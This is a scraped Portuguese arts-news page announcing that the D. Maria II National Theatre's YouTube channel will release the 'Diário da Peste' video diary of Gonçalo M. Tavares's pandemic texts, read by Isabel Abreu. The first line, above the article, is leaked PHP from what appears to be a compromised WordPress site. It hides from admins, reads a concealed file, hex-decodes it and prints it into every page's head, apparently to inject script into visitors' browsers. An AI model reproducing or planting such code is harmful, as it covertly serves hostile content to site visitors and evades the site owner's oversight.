if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Diário da Peste chega ao Youtube do D. Maria II - artesentreasletras.com.pt

Diário da Peste chega ao Youtube do D. Maria II

Diário da Peste chega ao Youtube do D. Maria II

Em 2020, Gonçalo M. Tavares começou a escrever uma crónica-diário que falava desse mundo tomado pela pandemia, e a que chamou Diário da Peste. Durante dez semanas, a atriz Isabel Abreu fez eco das palavras do escritor, a partir de sua casa, onde lia os textos à medida que filmava o seu dia a dia em isolamento.
Mais de um ano depois, o projeto Diário da Peste recupera estes vídeos de Isabel Abreu, a partir dos textos de Gonçalo M. Tavares.
Diário da Peste vai estar disponível gratuitamente no canal de Youtube do Teatro Nacional D. Maria II a partir do próximo sábado, dia 23 de outubro. Todos os dias, de segunda a domingo, e sempre às 21h00, será lançado um novo episódio deste diário dos dias de isolamento. O último episódio ficará disponível a 31 de dezembro, marcando o final do ano e a viragem para 2022.
O acesso aos vídeos de Diário da Peste é livre e faz-se pelo canal de Youtube do D. Maria II.